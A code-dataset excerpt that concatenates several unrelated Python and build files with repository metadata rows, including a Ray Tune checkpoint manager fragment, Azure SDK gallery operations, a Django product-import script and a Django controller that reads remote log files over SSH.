self._process_checkpoint(checkpoint_results[0], decode_checkpoint_fn)
]
self.register_checkpoints(checkpoints=tracked_checkpoints)
def _get_next_checkpoint_path(self) -> Optional[Path]:
"""Path to the next checkpoint to persist."""
checkpoint_path = _construct_checkpoint_path_name(
self._latest_checkpoint_id + 1
)
return self.latest_checkpoint_dir.joinpath(checkpoint_path)
def on_start_training(
self,
checkpoint_strategy: Optional[CheckpointConfig],
run_dir: Path,
latest_checkpoint_id: Optional[int] = 0,
):
checkpoint_strategy = checkpoint_strategy or CheckpointConfig()
self._checkpoint_strategy = checkpoint_strategy
self._validate_checkpoint_strategy()
self.run_dir = run_dir
self._latest_checkpoint_id = latest_checkpoint_id or 0
# Train-specific attributes
@property
def latest_checkpoint(self):
if not self._latest_memory_checkpoint:
return None
return self._latest_memory_checkpoint.dir_or_data
@property
def latest_checkpoint_dir(self) -> Optional[Path]:
"""Path to the latest checkpoint directory."""
checkpoint_dir = Path(TRAIN_CHECKPOINT_SUBDIR)
return construct_path(checkpoint_dir, self.run_dir)
@property
def latest_checkpoint_file_name(self) -> Optional[str]:
"""Filename to use for the latest checkpoint."""
if self._latest_checkpoint_id > 0:
return _construct_checkpoint_path_name(self._latest_checkpoint_id)
else:
return None
@property
def next_checkpoint_path(self) -> Optional[Path]:
"""Path to the next checkpoint to persist."""
checkpoint_file = _construct_checkpoint_path_name(
self._latest_checkpoint_id + 1
)
return self.latest_checkpoint_dir.joinpath(checkpoint_file)
@property
def best_checkpoint_path(self) -> Optional[Path]:
"""Path to the best persisted checkpoint."""
if self._best_persisted_checkpoint:
return Path(self._best_persisted_checkpoint.dir_or_data)
else:
return None
@property
def latest_checkpoint_id(self) -> Optional[int]:
"""The checkpoint id of most recently saved checkpoint.
If no checkpoint has been saved yet, then return None.
"""
checkpoint_id = self._latest_checkpoint_id
if checkpoint_id == 0:
return None
else:
return checkpoint_id
class TuneCheckpointManager(CheckpointManager):
def __init__(
self,
run_dir: Optional[Path] = None,
checkpoint_strategy: Optional[CheckpointConfig] = None,
):
super().__init__(run_dir, checkpoint_strategy)
# Name of the marker dropped by the Trainable. If a worker detects
# the presence of the marker in the trial dir, it will use lazy
# checkpointing.
self._lazy_marker_path = None
if tune.is_session_enabled():
self._lazy_marker_path = (
Path(session.get_trial_dir()) / LAZY_CHECKPOINT_MARKER_FILE
)
with open(self._lazy_marker_path, "w"):
pass
def _load_checkpoint(
self, checkpoint_to_load: Optional[Union[Dict, str, Path, Checkpoint]]
) -> Optional[Union[Dict, Checkpoint]]:
loaded_checkpoint = super()._load_checkpoint(checkpoint_to_load)
assert not loaded_checkpoint or isinstance(loaded_checkpoint, Checkpoint)
# `latest_checkpoint_id` will be the id assigned to the next checkpoint,
# which should be one more than the loaded checkpoint's id
# If no checkpoint is loaded, initialize this to 0
self._latest_checkpoint_id = (
getattr(loaded_checkpoint, TUNE_CHECKPOINT_ID, -1) + 1
)
return loaded_checkpoint
def add_tune_checkpoint_id(self, checkpoint: Checkpoint):
# Store the checkpoint_id in the file so that the Tune trial can be
# resumed after failure or cancellation.
setattr(checkpoint, TUNE_CHECKPOINT_ID, self._latest_checkpoint_id)
def _process_persistent_checkpoint(self, checkpoint: _TrackedCheckpoint):
self.add_tune_checkpoint_id(checkpoint.dir_or_data)
# Train may choose not to commit a checkpoint, but make sure the
# checkpoint is always committed for Tuning purpose.
# After this is committed, checkpoint.dir_or_path will become a string,
# which will prevent this checkpoint from being commtted again in the
# subsequent super()._process_persistent_checkpoint() call.
with tune.checkpoint_dir(step=self._latest_checkpoint_id) as checkpoint_dir:
path = Path(checkpoint_dir)
checkpoint.commit(path)
return super()._process_persistent_checkpoint(checkpoint)
@property
def latest_checkpoint_dir(self) -> Optional[Path]:
raise NotImplementedError
@property
def next_checkpoint_path(self) -> Optional[Path]:
return None
def _get_next_checkpoint_path(self) -> Optional[Path]:
return None
def __del__(self):
try:
assert self._lazy_marker_path
os.remove(str(self._lazy_marker_path))
except Exception:
pass
return super().__del__()
def _construct_checkpoint_path_name(checkpoint_id: int) -> str:
return f"checkpoint_{checkpoint_id:06d}"
| [
"[email protected]"
] | |
50d7896ca2a3fd81c7a3a5b423c105fc094df359 | 0f2112a0e198cb0275c002826854c836bbfb5bdf | /pywicta/image/__init__.py | ebc8b9794d95d617edc05784841fc62efa089799 | [
"MIT"
] | permissive | jeremiedecock/pywi-cta | a7f98ae59beb1adecb25623153c13e5bc70e5560 | 1185f7dfa48d60116472c12ffc423be78a250fc9 | refs/heads/master | 2021-04-15T12:06:03.723786 | 2019-03-21T02:33:15 | 2019-03-21T02:33:15 | 126,397,380 | 0 | 1 | MIT | 2018-10-16T12:17:52 | 2018-03-22T21:31:45 | Python | UTF-8 | Python | false | false | 158 | py | """Image functions
This package contains additional image processing functions.
"""
from . import hillas_parameters
from . import signal_to_border_distance
| [
"[email protected]"
] | |
936ac1a26cc0f0c3c4098e4dab5068c152183601 | 786de89be635eb21295070a6a3452f3a7fe6712c | /root/tags/V00-03-00/SConscript | 79a8398cab91d01f66746f757727ba8c866b37e9 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | #--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package root
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
#
# For the standard external packages which contain includes, libraries,
# and applications it is usually sufficient to call standardExternalPackage()
# giving some or all parameters.
#
root_ver = "5.34.25"
PREFIX = pjoin('$SIT_EXTERNAL_SW', "root", root_ver + "-$PYTHON")
INCDIR = "include/root"
LIBDIR = "lib"
LINKLIBS = "lib*.so*"
PKGLIBS = "Core Cint RIO Net Hist Graf Graf3d Gpad Tree Rint Postscript Matrix Physics MathCore Thread m dl"
BINDIR = "bin"
LINKBINS = "root root.exe rootcint root-config"
PYDIR = "lib"
LINKPY = "*.py libPyROOT.so*"
standardExternalPackage('root', **locals())
| [
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] | [email protected]@b967ad99-d558-0410-b138-e0f6c56caec7 |
|
38a7fca7aa7911336a605a76d7fe26a7822d15be | 0a2cc497665f2a14460577f129405f6e4f793791 | /sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2018_06_01/aio/operations/_galleries_operations.py | 78b2fc6273345d2b9c8cba61fa9f1031eb1862b9 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | hivyas/azure-sdk-for-python | 112158aa9e1dd6e30cf6b3dde19f5db6ea2a577b | 8b3258fa45f5dc25236c22ad950e48aa4e1c181c | refs/heads/master | 2023-06-17T12:01:26.392186 | 2021-05-18T19:56:01 | 2021-05-18T19:56:01 | 313,761,277 | 1 | 1 | MIT | 2020-12-02T17:48:22 | 2020-11-17T22:42:00 | Python | UTF-8 | Python | false | false | 23,103 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class GalleriesOperations:
"""GalleriesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2018_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
gallery_name: str,
gallery: "_models.Gallery",
**kwargs
) -> "_models.Gallery":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(gallery, 'Gallery')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Gallery', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Gallery', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
gallery_name: str,
gallery: "_models.Gallery",
**kwargs
) -> AsyncLROPoller["_models.Gallery"]:
"""Create or update a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery. The allowed characters are alphabets
and numbers with dots and periods allowed in the middle. The maximum length is 80 characters.
:type gallery_name: str
:param gallery: Parameters supplied to the create or update Shared Image Gallery operation.
:type gallery: ~azure.mgmt.compute.v2018_06_01.models.Gallery
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Gallery or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2018_06_01.models.Gallery]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
gallery_name=gallery_name,
gallery=gallery,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def get(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> "_models.Gallery":
"""Retrieves information about a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery.
:type gallery_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Gallery, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2018_06_01.models.Gallery
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery to be deleted.
:type gallery_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
gallery_name=gallery_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.GalleryList"]:
"""List galleries under a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either GalleryList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2018_06_01.models.GalleryList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GalleryList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('GalleryList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.GalleryList"]:
"""List galleries under a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either GalleryList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2018_06_01.models.GalleryList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GalleryList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('GalleryList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/galleries'} # type: ignore
| [
"[email protected]"
] | |
afbec97b1c9d34f73ceab3845b07f37693580dcc | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncolman.py | b4eb8ea4b99751f343c4618a341e4a0f9d07a3cc | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 64 | py | ii = [('WadeJEB.py', 4), ('ClarGE3.py', 15), ('HogaGMM2.py', 7)] | [
"[email protected]"
] | |
47aedceb25e986a3e5d3aae64be46cd960624d18 | 81f128c1d3ffc57ea35053a0f42bc3adb8ac820d | /MxShop/db_tools/import_goods_data.py | 71e3cfa1b711929ae1f857f0ba8333e70073b35b | [] | no_license | tminlun/tminlun-MxShop | f06816b5f596cffb7fa634891a70567055de1bf9 | a1ccf4b05edd8b47ad716fe65072b5be6e501e50 | refs/heads/master | 2022-12-10T11:08:28.043339 | 2019-04-15T15:12:44 | 2019-04-15T15:12:44 | 176,200,320 | 0 | 0 | null | 2022-12-08T01:43:02 | 2019-03-18T03:47:29 | Python | UTF-8 | Python | false | false | 2,099 | py | # _*_ encoding:utf-8 _*_
__author__ = '田敏伦'
__date__ = '2019/2/27 0027 20:38'
# Import the goods data into the database
import sys
import os
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(pwd, ".."))  # make the project root importable before configuring Django
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MxShop.settings')
import django
django.setup()
from db_tools.data.product_data import row_data
from goods.models import Goods,GoodsCategory,GoodsImage
for goods_detail in row_data:
goods = Goods()
goods.name = goods_detail["name"]
# replace("¥", "")把¥替换成 ""
goods.market_price = float(int(goods_detail["market_price"].replace("¥", "").replace("元", "")))
goods.shop_price = float(int(goods_detail["sale_price"].replace("¥", "").replace("元", "")))
    # pass the value through when it is not None; otherwise store "" (the field does not accept None)
goods.goods_brief = goods_detail["desc"] if goods_detail["desc"] is not None else ""
goods.goods_desc = goods_detail["goods_desc"] if goods_detail["goods_desc"] is not None else ""
    # use the first image as the cover image; fall back to "" when there are no images (the image field is stored as a str)
goods.goods_front_image = goods_detail["images"][0] if goods_detail["images"] else ""
    # use the third-level (deepest) category as the product's category
category_name = goods_detail["categorys"][-1]
    # use filter() rather than get(): filter() returns an empty queryset instead of raising when nothing
    # matches (goods.category needs a GoodsCategory instance; assigning a plain str would fail)
category = GoodsCategory.objects.filter(name=category_name)
    print(category[0])  # category is a queryset; category[0] is the matched GoodsCategory instance
    if category:
        goods.category = category[0]  # category of the current product
        goods.save()
    # product images
for good_image in goods_detail["images"]:
goods_image_instance = GoodsImage()
goods_image_instance.image = good_image
        goods_image_instance.goods = goods  # goods is the instance created in the outer loop above
goods_image_instance.save() | [
"[email protected]"
] | |
a95902c6e18ce1bc91769f463fdcadd5edc5103a | b776894e97c2cedb791cb6d860865908d13b6fa9 | /op_app/Controllers/logDetailControllerClass.py | 87f3670e671f689c175562fb968b544499703355 | [] | no_license | yezimai/v11 | 30463acf9cd4c2b9bd43eb0c722947804a08c36e | a4029afb169962b0f041ac2dc9e5c03a61cba8ee | refs/heads/master | 2021-09-04T00:32:13.951114 | 2018-01-13T10:05:39 | 2018-01-13T10:05:39 | 116,007,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,704 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from op_app.logger.log import runlog
from op_app.Model.base.baseModelClass import BaseDbModelClass
from op_app.Model.base.operation_dbModelClass import Operation_dbModelClass
from op_app.logger.log import dblog, runlog
from op_app.lib import appConfigDetailClass, pub
import json
from op_app.Extends.paramikoTool import ParamikoTool
import os
import sys
class LogDetailControllerClass(object):
def __init__(self, request):
# super(LogDetailControllerClass, self).__init__()
self.request = request
self.uid = self.request.user.id
self.project_id = self.request.GET.get('project_id', '')
self.env_id = self.request.GET.get('env_id', '')
self.app_id = self.request.GET.get('app_id', '')
self.ip = self.request.GET.get('ip', '')
self.server_type = self.request.GET.get('server_type', '')
self.server_id = self.request.GET.get('server_id', '')
self.action = self.request.GET.get('action', '')
self.line_num = self.request.GET.get('line_num', '100')
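    # getLogDetail: validates the request args, checks the user's permission,
    # resolves the log file path from the app type/action, then pulls the tail
    # of that file over SSH via ParamikoTool.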
def getLogDetail(self):
        # Validate the parameters passed from the front end
if self.project_id == '' or self.env_id == '' or self.app_id == '' or self.ip == ''\
or self.action == ''or self.server_type == '' or self.server_id == '':
# print('p_id,e_id,a_id,ip,action,server_type,server_id,',self.project_id,self.env_id,self.app_id,self.ip,self.action,self.server_type,self.server_id)
            print('invalid action args from web...')
            runlog.error("[ERROR] wrong action args from web, file: [ %s ], line: [ %s ]"
                         % (__file__, sys._getframe().f_lineno))
            return 'invalid action args from web...'
else:
            # Check whether the user has permission; if not, return the reason
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
return 'no permissions to view'
            # Fetch the app's connection details (user name, password, etc.)
instance = appConfigDetailClass.appConfigDetail()
res, status = instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id, self.project_id)
print('logapp--res',res)
if not status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
res_dic = dict()
for i in res:
res_dic['install_user'] = i[1]
res_dic['app_type'] = i[2]
res_dic['appdir'] = i[3]
res_dic['app_name'] = i[6]
res_dic['pass'] = i[7]
res_dic['sshport'] = i[8]
res_dic['sshuser'] = i[9]
            # Fetch the requested number of lines from the log file on the remote server
# print('dict_res',res_dic)
            if res_dic['app_type'] == '1':  # the app type is Tomcat
if self.action == 'start':
log_file_path = '{}/logs/catalina.out'.format(res_dic['appdir'])
# print('00---00',log_file_path)
elif self.action == 'stop':
log_file_path = '/home/{}/service_manage/{}/scripts/log/stopapp.sh.log'.format(\
res_dic['sshuser'], res_dic['app_name'])
elif self.action == 'log_show':
logdir_id = self.request.GET.get('logdir_id', '')
file_name = self.request.GET.get('file_name','')
                    print('logdir_id, file_name:', logdir_id, file_name)
                    if logdir_id == '' or file_name == '':
                        runlog.error("the logdir_id or filename is null, file: [ %s ], line: [ %s ]" % (
                            __file__, sys._getframe().f_lineno))
                        return 'invalid logdir_id to find the logfile'
                    # Locate the log directory configured for this app
log_dir = instance.app_LogDir(self.app_id, self.server_type, self.server_id, logdir_id)
if len(log_dir) == 0:
runlog.error("the logdir is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
                        return 'invalid logdir to find the logfile'
log_file_path = '{}/{}'.format(log_dir[0][0],file_name)
                    print('log_file_path:', log_file_path)
else:
runlog.error("the APP type is not tomcat, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
                return 'invalid action to find the logfile'
            pt = ParamikoTool()  # instantiate, then fetch the requested number of log lines
log_res = pt.getlogrow(self.ip, res_dic['sshport'], res_dic['sshuser'], \
